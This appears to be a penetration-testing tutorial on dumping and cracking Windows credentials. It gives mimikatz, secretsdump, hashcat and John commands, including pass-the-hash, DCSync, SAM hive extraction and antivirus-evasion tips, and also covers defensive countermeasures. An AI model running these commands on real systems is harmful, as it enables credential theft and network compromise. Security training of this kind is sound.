Windows System Password Recovery
Extracting and cracking Windows authentication credentials
What You'll Discover
🎯 Why This Matters
Windows password cracking represents a fundamental skill in penetration testing and incident response. Windows systems dominate enterprise environments, with Active Directory authentication controlling access to critical resources across entire networks. Understanding how to extract and crack Windows credentials enables security professionals to assess password policies, demonstrate attack feasibility, and identify vulnerable accounts before malicious actors exploit them. During penetration tests, obtaining local administrator or domain credentials often provides the pivot point for lateral movement, privilege escalation, and achieving full network compromise. Mastering Windows password cracking techniques is essential for evaluating the true security posture of Windows-based infrastructure.
🔍 What You'll Learn
You'll master Windows credential extraction tools including mimikatz, secretsdump.py, and pwdump, understand NTLM and NTLMv2 hash formats and their vulnerabilities, learn SAM database extraction techniques from offline and live systems, and develop skills in password cracking, pass-the-hash attacks, and Active Directory password auditing. These techniques are critical for penetration testing Windows environments, assessing organizational password policies, identifying credential reuse patterns, and understanding how attackers pivot through Windows networks using stolen authentication material.
🚀 Your First Win
In the next 20 minutes, you'll understand how Windows stores passwords, learn to extract NTLM hashes from the SAM database, and know exactly how security professionals crack Windows credentials during security assessments.
🔧 Try This Right Now
Let's examine how Windows password hashes work using a simple demonstration (requires Windows or Kali Linux with Impacket):
# NTLM Hash Generation Example
# Windows NTLM hashes are MD4 hashes of the UTF-16LE password
# Install passlib for NTLM hash generation:
# Ubuntu/Debian:
sudo apt install python3-passlib
# OR via pip:
pip3 install passlib
# Generate NTLM hash:
python3 -c "from passlib.hash import nthash; print(nthash.hash('password'))"
# Output: 8846f7eaee8fb117ad06bdd830b7586c
# The same password always produces the same hash (no salt!)
# This is why NTLM is vulnerable to rainbow tables
# For penetration testing, you'll extract hashes from:
# 1. SAM database (local accounts)
# 2. NTDS.dit (Active Directory)
# 3. Memory dumps (mimikatz)
# 4. Network captures (NTLMv2 challenge/response)
# Example: Viewing local SAM hashes (requires admin)
# Windows:
# reg save HKLM\SAM sam.save
# reg save HKLM\SYSTEM system.save
# Linux (mount Windows partition):
# sudo mount /dev/sda1 /mnt
# ls /mnt/Windows/System32/config/SAM
# Extract hashes with secretsdump.py (Impacket):
# secretsdump.py -sam sam.save -system system.save LOCAL
# You'll see format:
# username:RID:LM_hash:NTLM_hash:::
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::You'll see: NTLM hashes are 32-character hexadecimal strings representing MD4 hashes of passwords. The lack of salting means identical passwords produce identical hashes, enabling rainbow table attacks and making weak passwords instantly recognizable. Understanding this hash format is fundamental to Windows credential attacks.
Skills You'll Master
✅ Core Understanding
- Windows authentication mechanisms and NTLM protocol
- SAM database structure and credential storage
- NTLM vs NTLMv2 hash format differences
- Local vs domain credential extraction techniques
🔍 Expert Skills
- Advanced mimikatz credential extraction techniques
- Active Directory NTDS.dit password auditing
- Pass-the-hash and pass-the-ticket attacks
- Kerberos ticket extraction and manipulation
Understanding Windows Authentication
Windows authentication has evolved through multiple generations, with NTLM (NT LAN Manager) representing the legacy protocol still widely used today. When a user logs into Windows, their password is hashed using MD4 (for NTLM) and stored in the Security Account Manager (SAM) database for local accounts, or in Active Directory's NTDS.dit database for domain accounts. The critical vulnerability is that NTLM hashes use no salt - identical passwords produce identical hashes across all Windows systems. This design flaw, maintained for backward compatibility, enables rainbow table attacks and makes weak passwords instantly recognizable to attackers who obtain hash databases.
🔐 Windows Password Storage
User Password → UTF-16LE Encoding → MD4 Hash → NTLM Hash
Stored in: SAM (local) or NTDS.dit (domain)
No salt, no iterations - identical passwords = identical hashes
The Weakness
NTLM uses MD4 hashing with no salt or key derivation, making it extremely fast to crack. Rainbow tables contain precomputed hashes for billions of passwords.
The Attack
Extract NTLM hashes from SAM database, memory, or network captures, then crack with hashcat/John the Ripper or use pass-the-hash to authenticate directly.
The Result
System compromise, lateral movement through networks, privilege escalation to domain admin, and persistent access to Windows infrastructure.
The Microsoft NTLM authentication documentation describes the protocol mechanics, but the security implications are severe. NTLM hashes can be cracked at speeds exceeding 100 billion attempts per second on high-end GPUs. Simple passwords like "Password1" crack instantly, while even complex 8-character passwords may fall within hours. The absence of key derivation functions like PBKDF2 means there's no computational cost to password testing, unlike modern password hashing schemes.
Pass-the-hash attacks represent an even more critical vulnerability in Windows authentication. Since Windows systems authenticate using NTLM hashes directly (not the plaintext password), attackers who obtain hashes can authenticate to systems without ever cracking the password. Tools like mimikatz, Impacket's psexec.py, and CrackMapExec enable lateral movement through Windows networks using stolen NTLM hashes. This fundamentally undermines password-based security - even strong, random passwords provide no protection against pass-the-hash attacks once the hash is compromised. Organizations must implement additional controls like credential guard, restricted admin mode, and proper network segmentation to mitigate this attack vector.
Tools and Techniques
🔨 mimikatz: Credential Extraction Master
Mimikatz, created by Benjamin Delpy, represents the industry standard for Windows credential extraction. This tool extracts plaintext passwords, NTLM hashes, Kerberos tickets, and other authentication material from Windows memory. While primarily known for post-exploitation credential theft, mimikatz also enables pass-the-hash, pass-the-ticket, and golden ticket attacks.
# Download mimikatz from: https://github.com/gentilkiwi/mimikatz
# Requires administrator privileges
# Basic credential dumping
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
# Output shows:
# - Usernames
# - Domains
# - NTLM hashes
# - Sometimes plaintext passwords (if WDigest enabled)
# Extract all credentials from LSASS memory
sekurlsa::logonpasswords full
# Dump SAM database hashes
lsadump::sam
# Pass-the-hash attack (authenticate using hash)
sekurlsa::pth /user:Administrator /domain:HACKERDNA /ntlm:8846f7eaee8fb117ad06bdd830b7586c /run:cmd.exe
# Kerberos ticket extraction
sekurlsa::tickets /export
# DCSync attack (extract hashes from Domain Controller)
lsadump::dcsync /domain:hackerdna.local /user:Administrator
# Note: Modern Windows Defender detects mimikatz
# Use obfuscated versions or execute from memory
# Alternatives: pypykatz, SharpKatz, SafetyKatzMimikatz's power comes from its ability to interact with Windows authentication subsystems at a low level. The sekurlsa module extracts credentials from LSASS (Local Security Authority Subsystem Service) memory, where Windows caches authentication material. The official mimikatz repository provides comprehensive documentation, though security professionals should note that mimikatz is heavily signatured by antivirus. Production pentests require evasion techniques or alternative tools.
⚡ Impacket secretsdump: Offline Hash Extraction
Impacket's secretsdump.py provides powerful offline credential extraction from SAM, SYSTEM, and NTDS.dit files. This Python tool works across platforms and doesn't require Windows, making it ideal for forensic analysis and offline password auditing.
# Install Impacket
pip3 install impacket
# Extract local SAM hashes (offline)
# First, obtain SAM and SYSTEM registry hives
# On target Windows system (as admin):
# reg save HKLM\SAM sam.save
# reg save HKLM\SYSTEM system.save
# Extract hashes with secretsdump
secretsdump.py -sam sam.save -system system.save LOCAL
# Output format:
# username:RID:LM_hash:NTLM_hash:::
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
# Remote extraction (requires credentials)
secretsdump.py 'DOMAIN/user:password@<target>'
# Using NTLM hash for authentication (pass-the-hash)
secretsdump.py -hashes :8846f7eaee8fb117ad06bdd830b7586c 'DOMAIN/Administrator@<target>'
# Extract Active Directory hashes from NTDS.dit
# First, obtain NTDS.dit and SYSTEM from Domain Controller
secretsdump.py -ntds ntds.dit -system system.save LOCAL
# DCSync attack (remotely extract DC hashes)
secretsdump.py 'DOMAIN/Administrator:password@<target>' -just-dc
# Extract specific user
secretsdump.py 'DOMAIN/Administrator:password@<target>' -just-dc-user krbtgtSecretsdump excels at offline analysis, making it valuable for forensic investigations and password audits where you have disk images or registry dumps. The tool also supports remote extraction via SMB, enabling credential harvesting from live systems during authorized penetration tests. For Active Directory environments, extracting NTDS.dit provides hashes for every domain account, enabling comprehensive password policy assessment.
🚀 hashcat: GPU-Accelerated NTLM Cracking
Hashcat provides extreme performance for NTLM hash cracking through GPU acceleration. NTLM's lack of key derivation makes it one of the fastest hash types to crack - modern GPUs achieve over 100 billion NTLM attempts per second.
# Hashcat mode for NTLM: 1000
# Format: hash or username:hash
# Dictionary attack
hashcat -m 1000 -a 0 ntlm_hashes.txt rockyou.txt
# Rule-based attack for password mutations
hashcat -m 1000 -a 0 ntlm_hashes.txt rockyou.txt -r rules/best64.rule
# Mask attack for known patterns
# Example: 8 chars, starts with capital, ends with 2 digits
hashcat -m 1000 -a 3 ntlm_hashes.txt '?u?l?l?l?l?l?d?d'
# Hybrid attack: wordlist + mask
hashcat -m 1000 -a 6 ntlm_hashes.txt rockyou.txt '?d?d?d?d'
# Combination attack
hashcat -m 1000 -a 1 ntlm_hashes.txt wordlist1.txt wordlist2.txt
# Show cracked passwords
hashcat -m 1000 ntlm_hashes.txt --show
# Benchmark NTLM cracking speed
hashcat -m 1000 -b
# Typical speeds:
# RTX 3090: 100+ GH/s (100 billion hashes/second)
# RTX 4090: 200+ GH/s
# Even weak GPUs achieve billions of attempts/second
# For NTLMv2 (challenge/response from network capture)
# Mode 5600: NetNTLMv2
hashcat -m 5600 -a 0 ntlmv2_hashes.txt rockyou.txtThe extreme speed of NTLM cracking means password length becomes critical. An 8-character password using all character types can be exhaustively searched in weeks on consumer hardware. Organizations should require 14+ character passwords minimum, though even this provides limited protection against targeted attacks with custom wordlists. NTLMv2 cracking is significantly slower due to challenge/response computation, but still vulnerable to dictionary attacks.
🎯 John the Ripper: Versatile Password Cracking
John the Ripper provides excellent NTLM cracking with automatic format detection and built-in wordlist management. While slower than hashcat's GPU acceleration, John excels at incremental mode and custom rule-based attacks.
# Format detection and cracking
john ntlm_hashes.txt
# Specify format explicitly
john --format=NT ntlm_hashes.txt
# Dictionary attack
john --wordlist=rockyou.txt ntlm_hashes.txt
# Rule-based mutations
john --rules --wordlist=rockyou.txt ntlm_hashes.txt
# Incremental mode (brute force)
john --incremental ntlm_hashes.txt
# Show cracked passwords
john --show ntlm_hashes.txt
# Custom rules for corporate Windows passwords
echo '[List.Rules:WindowsRules]' > windows.conf
echo 'cAz"[0-9][0-9][0-9][0-9]"' >> windows.conf # Company name + 4 digits
echo 'cAz"[!@#$]"' >> windows.conf # Capitalize + special char
echo 'Az"[0-9][0-9]""[!@#]"' >> windows.conf # Word + digits + special
john --rules=WindowsRules --wordlist=company.txt ntlm_hashes.txt
# Session management
john --session=hdna_windows ntlm_hashes.txt
john --restore=hdna_windowsJohn the Ripper's strength lies in its rule engine and incremental mode. Corporate Windows passwords often follow predictable patterns (Season+Year+Special, CompanyName+Quarter, etc.), making custom rules highly effective. The incremental mode systematically tests passwords by frequency analysis, often cracking simple passwords faster than dictionary attacks.
Defensive Countermeasures
🛡️ Strong Password Policies
Given NTLM's weak hashing, Windows environments require stringent password policies that account for the extreme speed of offline cracking. Microsoft's password policy recommendations provide baseline guidance, but organizations should exceed these minimums for privileged accounts.
- Minimum 14 characters: Longer passwords exponentially increase cracking time
- Passphrases over complexity: "correct horse battery staple" beats "P@ssw0rd!"
- Privileged account requirements: 20+ characters for domain admins and service accounts
- Password rotation: Regular changes for privileged accounts (quarterly minimum)
🔐 Credential Protection Technologies
Modern Windows versions include credential protection features that mitigate credential theft and pass-the-hash attacks. Organizations should enable these protections across all Windows systems, particularly on high-value targets like servers and administrator workstations.
- Credential Guard: Uses virtualization-based security to protect NTLM hashes and Kerberos tickets
- Remote Credential Guard: Protects credentials during Remote Desktop sessions
- Restricted Admin Mode: RDP without sending credentials to remote system
- LSA Protection: Prevents code injection into LSASS process
⚡ Active Directory Security Hardening
Active Directory security extends beyond password policies to include privilege management, audit logging, and attack surface reduction. The tiered administrative model separates high-privilege accounts from day-to-day operations, limiting credential exposure.
- Tiered administration: Separate admin accounts for Tier 0 (Domain Controllers), Tier 1 (servers), Tier 2 (workstations)
- Privileged Access Workstations (PAW): Dedicated, hardened systems for administrative tasks
- Just-In-Time (JIT) administration: Temporary privilege elevation instead of persistent admin rights
- Disable NTLM authentication: Transition to Kerberos-only where possible
🔍 Monitoring and Detection
Detecting credential theft and pass-the-hash attacks requires comprehensive logging, behavioral analysis, and security monitoring. Organizations should implement detection mechanisms for common attack patterns associated with Windows credential compromise.
- Enhanced audit policies: Log all authentication events, privilege use, and sensitive object access
- Credential dumping detection: Monitor for mimikatz signatures and LSASS access
- Lateral movement detection: Alert on unusual authentication patterns and service usage
- Password spray detection: Identify distributed authentication attempts across multiple accounts
FAQ
Windows Password Cracking Basics
How do I extract NTLM hashes from a Windows system?
Extract NTLM hashes using mimikatz (from memory with "sekurlsa::logonpasswords" or "lsadump::sam"), secretsdump.py (from SAM/SYSTEM registry hives offline), or by exporting registry keys with "reg save HKLM\SAM sam.save" and "reg save HKLM\SYSTEM system.save". For Active Directory, extract NTDS.dit from Domain Controllers using ntdsutil, volume shadow copies, or DCSync attacks via mimikatz/secretsdump. All methods require administrator privileges. Hashes appear in format username:RID:LM_hash:NTLM_hash where the NTLM hash is the 32-character hex string you'll crack.
What's the difference between NTLM and NTLMv2?
NTLM is the password hash stored in SAM/NTDS.dit (MD4 hash of password), while NTLMv2 is a challenge-response authentication protocol used over the network. NTLM hashes can be cracked offline at extreme speeds (100+ billion/sec on GPUs) or used directly in pass-the-hash attacks. NTLMv2 captures from network traffic include the challenge and response, requiring cracking to recover the password - much slower but still vulnerable to dictionary attacks. Use hashcat mode 1000 for NTLM hashes and mode 5600 for NTLMv2 network captures.
Why are NTLM hashes so fast to crack compared to other hash types?
NTLM uses a single MD4 hash with no salt and no key derivation function, making it computationally trivial to test passwords. Modern password hashes like bcrypt or PBKDF2 use thousands or millions of iterations to slow down cracking, but NTLM performs just one MD4 operation. This means GPUs can test over 100 billion NTLM passwords per second, while the same hardware might only test 100,000 bcrypt hashes per second - a million times slower. Microsoft maintains this weak hashing for backward compatibility with legacy systems, creating a fundamental vulnerability in Windows authentication.
Technical Implementation
What are pass-the-hash attacks and how do they work?
Pass-the-hash attacks authenticate to Windows systems using NTLM hashes directly without cracking the password. Windows accepts NTLM hashes for authentication, so attackers who steal hashes via mimikatz or secretsdump can use tools like Impacket's psexec.py, CrackMapExec, or mimikatz's "sekurlsa::pth" to authenticate as that user. This works because NTLM authentication sends the hash (or hash-derived value), not the password. Even strong random passwords provide no protection once the hash is stolen. Defenses include Credential Guard, disabling NTLM, and network segmentation to limit lateral movement.
How long does it take to crack different Windows password types?
Simple passwords (dictionary words, common patterns) crack instantly - often appearing in rainbow tables. 8-character passwords with mixed characters take hours to days depending on complexity. 10-character passwords may take weeks to months for full brute force. 14+ character passwords with high entropy become impractical to crack with current hardware - years to decades even with powerful GPU clusters. However, targeted dictionary attacks using corporate-specific wordlists crack passwords much faster than brute force. GPU speed matters enormously - an RTX 4090 cracks NTLM 10x faster than an RTX 2080, reducing days to hours.
Practical Applications
How do I crack Active Directory passwords for security auditing?
For Active Directory password audits, extract NTDS.dit using DCSync (mimikatz/secretsdump with Domain Admin credentials), NTDS.dit backup from Domain Controller, or volume shadow copy. Use "secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL" to dump all domain hashes. Feed these to hashcat with mode 1000 and comprehensive wordlists. Analyze results to identify weak passwords, password reuse, and policy violations. Focus on privileged accounts (Domain Admins, Enterprise Admins, service accounts). Use tools like DSInternals or NtdsAudit for additional password analysis like finding duplicate passwords across accounts.
What password patterns work best for corporate Windows cracking?
Corporate Windows passwords often follow predictable patterns: Season+Year (Winter2024, Spring2024), CompanyName+Numbers (Acme2024, Acme123), FirstName+LastInitial+Year (JohnS2024), and complexity requirements (Password1!, Welcome1!). Create custom wordlists from company name variations, employee names from LinkedIn, product names, and office locations. Use hashcat rules to apply common mutations - capitalize first letter, append years, add special characters. Combination attacks joining corporate terms with common passwords are highly effective. Password spraying with these patterns often succeeds before needing exhaustive cracking.
Why does mimikatz get detected by antivirus and how can I avoid detection?
Mimikatz is heavily signatured by antivirus because it's the most common credential dumping tool. Avoid detection by using obfuscated versions (Invoke-Mimikatz PowerShell script), compiled alternatives (pypykatz in Python, SharpKatz in C#), or execute directly from memory without touching disk. Use SafetyKatz which loads mimikatz dynamically, or write custom LSASS dumpers. For production pentests, dump LSASS process memory with legitimate tools (Task Manager, procdump) then extract credentials offline with pypykatz or mimikatz. Consider alternative techniques like DCSync which doesn't touch LSASS or secretsdump.py for offline hash extraction.
Can Credential Guard completely prevent credential theft?
Credential Guard significantly reduces credential theft risk by storing NTLM hashes and Kerberos tickets in a virtualized container protected by hardware virtualization. This prevents mimikatz and similar tools from accessing credentials in LSASS memory. However, Credential Guard doesn't protect against all attacks - it doesn't prevent keyloggers, physical access attacks, firmware attacks, or credential theft from unprotected memory. It also requires compatible hardware (UEFI, TPM 2.0, virtualization support) and isn't available on all Windows versions. Organizations should view Credential Guard as one layer of defense-in-depth, not a complete solution.
🎯 You've Got Windows Password Cracking Down!
You now understand Windows authentication mechanisms, can extract NTLM hashes from SAM databases and memory, and know how to crack Windows credentials using hashcat and John the Ripper. These skills are essential for penetration testing Windows environments, assessing organizational password policies, and understanding how attackers pivot through Windows networks using stolen authentication material.
Ready to explore advanced password cracking optimization techniques